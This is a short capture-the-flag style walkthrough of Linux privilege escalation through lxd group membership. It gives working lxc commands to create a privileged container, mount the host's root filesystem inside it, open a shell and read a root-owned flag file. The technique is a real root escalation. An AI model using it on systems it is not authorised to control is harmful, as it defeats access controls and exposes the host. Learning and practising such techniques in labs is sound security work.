Privilege Escalation: LXD group
We have a user who is in the lxd group.
The command to create a container:
lxc init ubuntu:16.04 exploit -c security.privileged=true
lxc init ubuntu:16.04 exploit
creates a new Ubuntu container with the nameexploit
-c security.privileged=true
gives the container access to the host's hard drive.
Next, you will mount the host filesystem to the container. You want to mount the root of the host OS to some directory in the container. To do this, run the following command:
lxc config device add exploit foo disk source=HOST_OS_DIRECTORY path=CONTAINER_MOUNT_LOCATION recursive=true
lxc config device add exploit foo disk
adds a disk calledfoo
to the containerexploit
source
specifies which directory in the host filesystem should be mountedpath
specifies where the host filesystem will be mounted inside the containerrecursive=true
specifies that folders should be added recursively
The HOST_OS_DIRECTORY
should be the root directory, /
.
The CONTAINER_MOUNT_LOCATION
should be an available directory on the container. For example, /mnt/root
.
All you have to do now is start the container and read the flag.
lxc start exploit
starts the container.
lxc exec exploit bash
gives you an interactive shell in the container.
If you specified the mount location to be /mnt/root
, then inside the container, the flag is located at /mnt/root/root/flag.txt